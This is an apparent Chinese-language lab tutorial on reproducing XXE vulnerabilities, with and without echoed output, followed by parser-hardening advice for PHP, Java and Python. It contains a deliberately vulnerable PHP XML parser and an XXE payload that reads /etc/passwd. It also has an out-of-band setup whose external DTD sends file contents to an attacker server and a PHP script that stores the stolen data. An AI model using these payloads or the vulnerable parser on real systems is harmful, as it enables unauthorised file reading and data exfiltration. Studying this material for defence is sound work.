XXE漏洞复现（有无回显）_无回显xxe

环境：这里可以在metasploitable中进行试验，不可以在centos中进行试验，因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令：rpm -qa | grep libxml可以去查看libxml的版本。
知识点
复现：
先去生成一个解析xml数据并打印传入的数据的一个php文件。

<?php 
$xml=file_get_contents("php://input"); 
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
print_r($data) ; 
echo "</pre>" ; 
?> 
1
2
3
4
5
6
7

通过抓包提交一个POST XML数据：

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<name>&xxe;</name>
</root>
1
2
3
4
5
6
7

读取php文件的时候就不能用file协议了，需要用filter协议。实现这一步的时候记得更改xxe.php文件的权限。
要是xxe漏洞是无回显的文件读取
环境：安装一个靶机xxe(自己起的),win10,kali。
准备：外部dtd文件（out.dtd），接受数据的xee.php文件，储存数据的文件（get.txt）。

<!ENTITY % p1 SYSTEM "file:///etc/passwd"> 
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://***.***.***.***/xxe.php?pass=%p1;'>"> %p2;
1
2

get.txt也得给权限！！！

<?php $pass=$_GET['pass']; 
file_put_contents('get.txt',$pass); ?>
1
2

复现：
直接开启抓包,并且传入XML代码
查看get.txt

防御：
升级libxml版本。
代码层防御 使用开发语言提供的禁用外部实体的方法
PHP： libxml_disable_entity_loader(true);
JAVA:

DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);  
1

Python： from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的XML数据
关键词：<!DOCTYPE和<!ENTITY，或者，SYSTEM和PUBLIC。